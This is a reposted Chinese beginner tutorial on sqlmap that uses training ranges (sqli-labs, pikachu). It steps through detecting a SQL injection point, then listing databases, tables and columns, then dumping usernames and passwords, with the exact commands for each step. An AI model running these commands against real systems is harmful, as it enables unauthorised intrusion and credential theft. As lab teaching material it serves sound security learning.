前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >新手学习sqlmap入门这一篇就够了,注入实操

新手学习sqlmap入门这一篇就够了,注入实操

作者头像
网e渗透安全部
发布2022-12-01 15:31:46
7320
发布2022-12-01 15:31:46
举报
文章被收录于专栏:白安全组白安全组白安全组

前言:

Sqlmap我想大部分都很熟悉,这里简单介绍一下,帮不太熟悉的朋友简单了解一下。众所周知,top10名列前茅的漏洞就是注入漏洞,任何一个学习web渗透测试的朋友都需要了解的一个内容,注入分为手工注入和自动工具注入,而sqlmap就是自动工具中最好用的工具。那么直接进入主题。

这里我们使用靶场sql-lab和pikachu

http://wangehacker.cn/thanks.html

靶场提供在我们的官网上,免费使用,免去一些新手的烦恼。

正文:

一、基本使用方式

首先我们要了解一下我们正常的注入的一个命令流程,我这里先演示最基本的一套流程

1、检测目标地址是否存在注入点。

这里使用的地址是我们网站的

http://wangehacker.cn/sqli-labs/Less-1/

这里我们需要在后面加上?id=1的传参

这里我们将这个网址直接扔到sqlmap中运行检测

s

qlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch

解释--batch是后面有一些选项我们选择默认选项

这里的命令是在kali中运行的,如果大家在Windows安装的sqlmap区别在红色部分

python sqlmap.py -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch

这里就代表存在着注入漏洞,我们就需要进行下一步步骤,我们扫库名

2、检测数据库中的库名

我们使用命令

sqlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch --dbs

3、选择需要爆的库开始爆表名

使用命令选择我们需要爆破的库名,开始爆库中的表

sqlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch -D pikachu --tables

这里我们顺利拿到表名

4、指定库名,表名爆破字段

使用命令:

sqlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch -D pikachu -T users --columns

5、选择字段爆破字段中的内容

使用命令:

sqlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch -D pikachu -T users -C username,password --dump

这里我们的sqlmap会对一些简单的md5加密值进行破解。到这里五步我们的基本使用方式就已经完成了,下面我们利用pikachu靶场练习不同类型的注入。

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2022-10-14,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 白安全组 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言:
  • 正文:
    • 一、基本使用方式
    相关产品与服务
    批量计算
    批量计算(BatchCompute,Batch)是为有大数据计算业务的企业、科研单位等提供高性价比且易用的计算服务。批量计算 Batch 可以根据用户提供的批处理规模,智能地管理作业和调动其所需的最佳资源。有了 Batch 的帮助,您可以将精力集中在如何分析和处理数据结果上。
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档